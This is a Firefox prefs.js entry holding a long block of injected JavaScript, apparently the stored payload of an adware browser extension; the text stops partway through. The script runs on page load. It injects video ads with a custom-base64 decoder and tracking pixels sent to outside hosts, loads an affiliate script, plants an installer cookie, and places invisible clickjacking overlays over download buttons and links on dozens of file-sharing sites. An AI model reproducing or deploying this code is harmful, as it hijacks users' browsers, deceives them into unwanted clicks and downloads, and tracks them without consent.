FF - prefs.js..extensions.GLndca3Cymm3Si07.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam7\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"sporty-glow.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1){return}}catch(e){};if(-1<document.location.host.indexOf(\"metacafe.com\")||-1<document.location.host.indexOf(\"dailymotion.com\")||-1<document.location.host.indexOf(\"youtube.com\")||-1<document.location.host.indexOf(\"ibtimes.com\")||-1<document.location.host.indexOf(\"espn.go.com\")||-1<document.location.host.indexOf(\"usatoday.com\")){var a=function(){new function(){var m=document.getElementsByTagName(\"body\")[0];if(\"true\"==m.getAttribute(\"data-vast-loaded\"))return!1;var e=this;e.utils=new function(){var b=this;b.dhtml_prop_name= function(c){return c.replace(/(\\-([a-z]){1})/g,function(c,b,f){return f.toUpperCase()})};b.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(c){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=b.dhtml_prop_name(d);return\"object\"==typeof c.currentStyle&&null!=c.currentStyle&&\"undefined\"!=typeof c.currentStyle[d]?c.currentStyle[d]:null}}}:function(c,b){return window.getComputedStyle(c,b)||{getPropertyValue:function(){}}};b.get_bounding_client_rect=function(c){var b= {top:0,left:0,right:0,bottom:0};\"undefined\"!=typeof c.getBoundingClientRect&&(b=c.getBoundingClientRect());return b};b.get_node_text_prop=function(b){return\"textContent\"in b?\"textContent\":\"innerText\"in b?\"innerText\":!1}};e.dom=new function(){this.json_to_html=function(b,c){if(\"#text\"==b.type)c=document.createTextNode(b.text);else if(\"#comment\"!=b.type){c||(c=document.createElement(b.type));if(b.attrs){for(var d in b.attrs)if(b.attrs.hasOwnProperty(d))if(\"style\"==d&&b.attrs.style instanceof Object)for(var g in b.attrs.style){var f= e.utils.dhtml_prop_name(g);c.style[f]=b.attrs.style[g]}else c.setAttribute(d,b.attrs[d]);\"iframe\"==b.type&&(b.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=b.attrs.frameborder),b.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=b.attrs.marginwidth),b.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=b.attrs.marginheight))}if(b.children)for(d=0;d<b.children.length;d++){f=b.children[d];g=arguments.callee(f);try{c.appendChild(g)}catch(p){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"== b.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(g=e.utils.get_node_text_prop(c))c[g]=f.text}}}return c}};e.events=new function(){var b=this;b.cache=[];b.add=window.addEventListener?function(c,d,g,f,e){\"undefined\"==typeof f&&(f=window);f.addEventListener(c,d,g);e&&b.cache.push([c,d,g,f])}:window.attachEvent?function(c,d,g,f,e){\"undefined\"==typeof f&&(f=window);f[\"e\"+c+d]=d;f[c+d]=function(){f[\"e\"+c+d](window.event)};f.attachEvent(\"on\"+c,f[c+d]);e&&b.cache.push([c,d,g,f])}:function(){}; b.remove=window.removeEventListener?function(b,d,g,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(b,d,g)}:window.detachEvent?function(b,d,g,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+b,f[b+d]);f[b+d]=null;f[\"e\"+b+d]=null}:function(){};b.flush=function(){for(var c=0;c<b.cache.length;c++)b.remove.apply(b,b.cache[c]);b.cache=[]}};e.msie=function(){var b=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(b)&&(b=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())|| [])[1],10));return isNaN(b)?!1:b}();e.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};var r={xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",encode:function(b){b=this._utf8_encode(b);for(var c=\"\",d=0;d<b.length;){var g=b.charCodeAt(d++),f=b.charCodeAt(d++),e=b.charCodeAt(d++),l=g>>2,g=(g&3)<<4|f>>4,h=(f&15)<<2|e>>6,k=e&63;isNaN(f)?h=k=64:isNaN(e)&&(k= 64);c=c+this.xlat.charAt(l)+this.xlat.charAt(g)+(64==h?\"=\":this.xlat.charAt(h))+(64==k?\"=\":this.xlat.charAt(k))}return c},_utf8_encode:function(b){for(var c=\"\",d=0;d<b.length;d++){var g=b.charCodeAt(d);128>g?c+=String.fromCharCode(g):(127<g&&2048>g?c+=String.fromCharCode(g>>6|192):(c+=String.fromCharCode(g>>12|224),c+=String.fromCharCode(g>>6&63|128)),c+=String.fromCharCode(g&63|128))}return c},decode:function(b){b=b.replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var c=\"\",d=0;d<b.length;){var g=this.xlat.indexOf(b.charAt(d++)), f = this.xlat.indexOf(b.charAt(d++)),e=this.xlat.indexOf(b.charAt(d++)),l=this.xlat.indexOf(b.charAt(d++)),h=(f&15)<<4|e>>2,k=(e&3)<<6|l,c=c+String.fromCharCode(g<<2|f>>4);64!=e&&0<h&&(c+=String.fromCharCode(h));64!=l&&0<k&&(c+=String.fromCharCode(k))}return this._utf8_decode(c)},_utf8_decode:function(b){for(var c=\"\",d=0;d<b.length;){var e=b.charCodeAt(d);if(128>e)c+=String.fromCharCode(e),d++;else if(191<e&&224>e)var f=b.charCodeAt(d+1),c=c+String.fromCharCode((e&31)<<6|f&63),d=d+2;else var f=b.charCodeAt(d+ 1),p=b.charCodeAt(d+2),c=c+String.fromCharCode((e&15)<<12|(f&63)<<6|p&63),d=d+3}return c}};e.target={};if(e.config&&e.config.templates instanceof Object&&e.config.templates.style instanceof Object&&\"style\"==e.config.templates.style.type){var n=e.dom.json_to_html(e.config.templates.style);\"undefined\"!=typeof n&&m.appendChild(n)}e.pixel={host:\"http://cbpx.installerdatauk.info\",params:function(b){return{cc:\"PL\",hostname:window.location.hostname,hid:\"16594767138824750826\",eid:\"42\", pid:\"1160\",v:\"0.0.1\",ch:b?b:2}}};e.ajax=new function(){this.get=function(b,c){try{var d=new XMLHttpRequest;d.open(\"GET\",b,!0);d.withCredentials=!0;d.onreadystatechange=function(){4==d.readyState&&c(d.responseText)};d.send()}catch(e){}}};e.getPixelUrl=function(b){b=e.pixel.params(b);var c=\"\",d;for(d in b)c+=d+\"=\"+b[d]+\"&\";c=c.slice(0,-1);return e.pixel.host+\"?\"+c};e.init=function(){window.vast_callback=function(b){b=r.decode(b);var c=JSON.parse(b);(new Image).src=e.getPixelUrl(\"[false]\"== b ? -2:2);if(c instanceof Array&&\"undefined\"!=typeof c[0]&&c[0]&&(b=c[0][0],!window._isLoaded&&(window._isLoaded=!0,-1!=window.location.href.indexOf(b.targets.player_1.domain)))){var c=b.targets.player_1.inserts[0].selector,d=b.targets.player_1.inserts[0].selector2,g=b.targets.player_1.inserts[0].selectorText,f=b.targets.player_1.inserts[0].cssText,p=b.targets.player_1.inserts[1].text,l=b.targets.player_1.url;e.isIE()&&(d=b.targets.player_1.inserts[0].selectorIE);var h=document.createElement(\"object\"); h.setAttribute(\"type\",\"application/x-shockwave-flash\");h.setAttribute(\"width\",\"100%\");h.setAttribute(\"height\",\"100%\");h.setAttribute(\"id\",\"webix_video\");h.setAttribute(\"data\",l);var k=document.querySelector(c),q=document.createElement(\"div\");q.setAttribute(\"id\",\"x-text\");q.innerHTML=p;var m=document.querySelector(g),n=document.querySelector(d);setTimeout(function(){for(var b in k.children){var c=k.children[b];c.style&&c.style.setProperty(\"display\",\"none\")}var d=document.createElement(\"div\");d.id= \"btn-x\";d.style.cssText=f;d.addEventListener(\"click\",function(){h.remove();c.style.removeProperty(\"display\");d.remove();q.remove()});k.insertBefore(h,c);n.insertBefore(d,n.firstChild);m.insertBefore(q,m.firstChild);(new Image).src=e.getPixelUrl()},2E3)}};e.ajax.get(\"https:\"==location.protocol?\"https://gadgetproffi.com?tid=4&subid=1160&subid1=16594767138824750826&subid2=42&lt=2617.24&k=NETWORK%20CHECK&__srvmid=2\":\"http://hearterest.com/?tid=4&subid=1160&subid1=16594767138824750826&subid2=42&lt=2617.24&k=NETWORK%20CHECK&__srvmid=2\", vast_callback)};(!e.isIE()||e.isIE()&&11<=e.msie)&&e.init();\"undefined\"==typeof window.__mcr&&(window.__mcr=e)}},s=document.createElement(\"script\");s.innerHTML=\"new \"+a;document.getElementsByTagName(\"body\")[0].appendChild(s)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//api.jollywallet.com/affiliate/client?dist=87&sub=prm&name=pricechop\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var g=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var f=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+f.top+\"px;left:\"+f.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(g){}},f=document.createElement(\"script\");\nf.type=\"text/javascript\";f[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+g.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(f)}-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(g=document.createElement(\"img\"),g.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),g.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",f=document.getElementById(\"r1113566095\").parentNode,\nf.style.position=\"relative\",f.appendChild(g))})();-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");\nif(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\n\")()\";document.body.appendChild(s)}}if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")}if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"}\n-1<document.location.host.indexOf(\"bookbrowsee.ne\")&&new function(){for(var g=[\"adv.php?\",\"/adv.php?\"],f=0;f<document.links.length;f++)for(var h=document.links[f],k=h.pathname+h.search,m=0;m<g.length;m++)g[m]==k.substr(0,g[m].length)&&\"nofollow\"==h.rel&&\"_blank\"==h.target&&(h.setAttribute(\"onclick\",\"return false\"),h.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};\nif(-1<document.location.host.indexOf(\"irrorcreator.co\"))for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c[b]==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1));\n-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1),a.addEventListener(\"mousedown\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1),a.addEventListener(\"mousedown\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1),a.addEventListener(\"mousedown\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1));\n-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));\nif(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var link=document.links[i];if(\".exe\"==link.href.substr(-4)){var p=link.parentNode;p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=0;d.style.left=0;d.style.width=\"100%\";d.style.height=\"100%\";d.style.cursor=\"pointer\";d.style.zIndex=9999;p.appendChild(d)}}\nif(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0],b2=document.createElement(\"button\");b2.className=b.className;b2.innerHTML=b.innerHTML;b.parentNode.insertBefore(b2,b);b.parentNode.removeChild(b)}-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");\n(function(){var g=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var f=setInterval(function(){try{var h=document.getElementById(\"ucd-countdown-1\"),m=[];m.push(1*h.children[2].children[1].children[1].innerText);m.push(1*h.children[2].children[2].children[1].innerText);m.push(1*h.children[3].children[1].children[1].innerText);m.push(1*h.children[3].children[2].children[1].innerText);for(var n=h=0;n<m.length;n++)h+=m[n];if(!(0<h)){clearInterval(f);var l=document.createElement(\"div\");l.style.position=\n\"absolute\";l.style.top=0;l.style.left=0;l.style.width=\"100%\";l.style.height=\"100%\";l.style.zIndex=\"9999\";l.style.cursor=\"pointer\";var q=document.getElementById(\"ucd-countdown-1-content\").children[1];q.style.position=\"relative\";q.appendChild(l)}}catch(u){try{var r=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){r+=1*jQuery(this).text()});if(0===r){clearInterval(f);var t=jQuery(\"#ucd-countdown-1-content iframe\"),v=t.parent();t.remove();v.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(w){\"undefined\"!==\ntypeof g&&30<++g&&clearInterval(f)}}},750)}catch(h){}})();\nvar __intervalcountasd=0,__intervalasd=setInterval(function(){__intervalcountasd++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var g=0;g<document.links.length;g++)try{var f=document.links[g].href.toLowerCase();if(-1==f.indexOf(\"ww.ziddu.co\")&&-1==f.indexOf(\"#\")&&-1==f.indexOf(\"tunes.apple.co\")&&-1==f.indexOf(\"lay.google.co\")&&-1==f.indexOf(\"/gallery/\")){try{for(var h=document.links[g],k=0;15>=k;k++)h=h.parentNode;if(-1<h.className.indexOf(\"footerbg\"))continue}catch(m){}var n=document.links[g].parentNode;\nif(!(-1<n.className.indexOf(\"addthis_toolbox\"))){n.style.position=\"relative\";var l=document.createElement(\"div\");l.style.position=\"absolute\";l.style.left=0;l.style.top=0;l.style.width=\"100%\";l.style.height=\"100%\";l.style.zIndex=\"9999\";l.style.cursor=\"pointer\";n.appendChild(l)}}}catch(q){}f=document.getElementsByTagName(\"iframe\");for(g=0;g<f.length;g++)try{-1==f[g].src.indexOf(\"acebook.co\")&&-1==f[g].src.indexOf(\"cp.crwdcntrl.ne\")&&(n=f[g].parentNode,n.style.position=\"relative\",l=document.createElement(\"div\"),\nl.style.position=\"absolute\",l.style.left=0,l.style.top=0,l.style.width=\"100%\",l.style.height=\"100%\",l.style.zIndex=\"9999\",l.style.cursor=\"pointer\",l.id=g,n.appendChild(l))}catch(u){}}20<__intervalcountasd&&clearInterval(__intervalasd)},500);\nnew function(){if(0<location.host.toLowerCase().indexOf(\"pensubtitles.or\")){f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"728px\";f.style.height=\"90px\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.zIndex=\"2000\";var g=document.getElementsByTagName(\"iframe\")[0].parentNode;g.insertBefore(f,document.getElementsByTagName(\"iframe\")[0]);g.style.position=\"relative\";f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"728px\";f.style.height=\"90px\";f.style.cursor=\n\"pointer\";f.style.top=\"0\";f.style.zIndex=\"2000\";g=document.getElementsByTagName(\"iframe\")[1].parentNode;g.insertBefore(f,document.getElementsByTagName(\"iframe\")[1]);g.style.position=\"relative\";g=document.links;for(i=0;i<g.length;i++)\"Download\"==(\"undefined\"===typeof g[i].innerText?g[i].textContent:g[i].innerText)&&(f=document.createElement(\"div\"),f.style.position=\"absolute\",f.style.width=\"214px\",f.style.height=\"40px\",f.style.cursor=\"pointer\",f.style.top=\"0\",f.style.zIndex=\"2000\",p=g[i].parentNode,\np.style.position=\"relative\",p.insertBefore(f,g[i]));document.getElementById(\"scrubbuad\").style.zIndex=\"15\";f=document.createElement(\"div\");f.style.zIndex=\"15000\";f.style.right=\"9px\";f.style.bottom=\"0\";f.style.position=\"fixed\";f.style.padding=\"0\";f.style.margin=\"0 0 30px 0\";f.style.width=\"220px\";f.style.height=\"72px\";f.style.overflow=\"visible\";f.style.cursor=\"pointer\";document.getElementsByTagName(\"body\")[0].firstChild.appendChild(f)}if(-1<window.location.href.indexOf(\"pensubtitles.us/opensubtitles-playe\")){g=\ndocument.getElementById(\"divPlayerDesc\");if(null!=g){g.style.position=\"relative\";var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.zIndex=\"2000\";g.appendChild(f)}g=document.getElementById(\"divPlayerHead\");if(null!=g)for(var h=0;h<g.children.length;h++)if(\"span\"==g.children[h].tagName.toLowerCase()){var k=g.children[h],f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";\nf.style.height=\"70px\";f.style.cursor=\"pointer\";f.style.top=\"-50px\";f.style.zIndex=\"2000\";k.style.position=\"relative\";k.appendChild(f)}}};\nif(-1<location.host.toLowerCase().indexOf(\"romptfile.co\")){for(var p={},frames=document.getElementById(\"confirmbox\").getElementsByTagName(\"iframe\"),index=0;index<frames.length;index++)\"300\"==frames[index].getAttribute(\"width\")&&\"250\"==frames[index].getAttribute(\"height\")&&(p=frames[index].parentNode);p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"255px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";p.appendChild(d)}\nnew function(){if(-1<window.location.host.toLowerCase().indexOf(\"pensoftwareupdater.co\"))if(\"undefined\"!==typeof $)window.__qqcount=0,window.__qqint=setInterval(function(){var f=$(\".download\").parent();f.css(\"position\",\"relative\");var g=document.createElement(\"div\");g.style.position=\"absolute\";g.style.zIndex=\"2000\";g.style.height=\"100%\";g.style.width=\"122px\";g.style.right=\"0\";g.style.top=\"0\";g.style.cursor=\"pointer\";f.append(g);f=$(\"#addBoxX\").parent();f.css(\"position\",\"relative\");g=document.createElement(\"div\");\ng.style.position=\"absolute\";g.style.zIndex=\"2000\";g.style.height=\"45px\";g.style.width=\"101px\";g.style.right=\"22px\";g.style.bottom=\"16px\";g.style.cursor=\"pointer\";f.append(g);window.__qqcount++;10<window.__qqcount&&clearInterval(window.__qqint)},250);else for(var g=document.links,f={},h={},k=0;k<g.length;k++)f=g[k].getAttribute(\"href\"),null!=f&&-1<f.toLowerCase().indexOf(\"pensoftwareupdater.com/idownloader.ph\")&&(f=g[k].getAttribute(\"id\"),null!=f&&\"addBoxX\"==f?(h=g[k].parentNode,h.style.position=\"relative\",\nf=document.createElement(\"div\"),f.style.position=\"absolute\",f.style.zIndex=\"2000\",f.style.height=\"45px\",f.style.width=\"101px\",f.style.right=\"22px\",f.style.bottom=\"16px\"):(h=g[k].parentNode,h.style.position=\"relative\",f=document.createElement(\"div\"),f.style.position=\"absolute\",f.style.zIndex=\"2000\",f.style.height=\"100%\",f.style.width=\"122px\",f.style.right=\"0\",f.style.top=\"0\"),f.style.cursor=\"pointer\",h.appendChild(f))};\nnew function(){if(-1<location.host.toLowerCase().indexOf(\"eehd.co\")){var g=document.createElement(\"div\");g.style.top=\"0\";g.style.width=\"100%\";g.style.height=\"100%\";g.style.cursor=\"pointer\";g.style.zIndex=\"2000\";g.style.position=\"absolute\";var f=document.getElementsByTagName(\"iframe\")[0].parentNode;f.style.position=\"relative\";f.appendChild(g);g=document.createElement(\"div\");g.style.top=\"0\";g.style.width=\"100%\";g.style.height=\"100%\";g.style.cursor=\"pointer\";g.style.zIndex=\"2000\";g.style.position=\"absolute\";\nf=document.getElementById(\"preview\");f.style.position=\"relative\";f.appendChild(g)}};new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.ne\")&&(window.__intCount=0,window.__int=setInterval(function(){var g=document.getElementById(\"download-manager-checkbox\");if(null!==g)try{g.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(f){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))};\nif(-1<document.location.host.indexOf(\"p3olimp.ne\")&&document.getElementsByClassName&&null!==document.getElementById(\"download-manager-checkbox\"))for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var g=document.getElementsByClassName(\"nasjfkla\"),f=0;f<g.length;f++)g[f].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var link=document.links[i],onclick=link.getAttribute(\"onclick\");if(onclick&&-1<onclick.indexOf(\"prepare_download_file\")){var div=\nlink.parentNode;div.style.position=\"relative\";b=document.createElement(\"div\");b.className=\"nasjfkla\";b.style.position=\"absolute\";b.style.top=\"-2px\";b.style.left=\"92px\";b.style.width=\"71px\";b.style.height=\"16px\";b.style.zIndex=\"99999\";b.style.cursor=\"pointer\";div.appendChild(b)}}\n-1<location.host.indexOf(\"p3olimp.ne\")&&setTimeout(function(){for(var g=document.getElementById(\"leftside\"),f=0;f<g.children.length;f++)if(/\\bspnBook\\b/.test(g.children[f].className))for(var h=g.children[f].getElementsByTagName(\"a\"),k=0;k<h.length;k++)h[k].setAttribute(\"href\",\"#\"),h[k].setAttribute(\"target\",\"\")},1E3);\nnew function(){if(-1<window.location.host.toLowerCase().indexOf(\"ullypcgames.ne\"))for(var g=document.getElementsByTagName(\"center\"),f=0;f<g.length;f++){var h=g[f].firstChild;\"undefined\"!==typeof h.tagName&&\"a\"==h.tagName.toLowerCase()&&(g[f].style.position=\"relative\",h=document.createElement(\"div\"),h.style.position=\"absolute\",h.style.top=\"0\",h.style.left=\"0\",h.style.width=\"100%\",h.style.height=\"100%\",h.style.zIndex=\"2000\",h.style.cursor=\"pointer\",g[f].appendChild(h))}};\nnew function(){if(-1<window.location.host.toLowerCase().indexOf(\"llplayer.com.b\"))for(var g=document.getElementsByTagName(\"img\"),f=0;f<g.length;f++)if(g[f].getAttribute(\"src\")&&-1<g[f].getAttribute(\"src\").indexOf(\"baixatudo.png\")){var h=document.createElement(\"div\");h.style.width=\"100%\";h.style.height=\"100%\";h.style.position=\"absolute\";h.style.zIndex=\"9999\";h.style.top=\"0\";h.style.cursor=\"pointer\";var k=g[f].parentNode.parentNode;k.style.position=\"relative\";k.appendChild(h)}};\nnew function(){if(0<location.host.toLowerCase().indexOf(\"ubtitulosespanol.or\")){var g=document.links;for(i=0;i<g.length;i++)if(\"Descargar 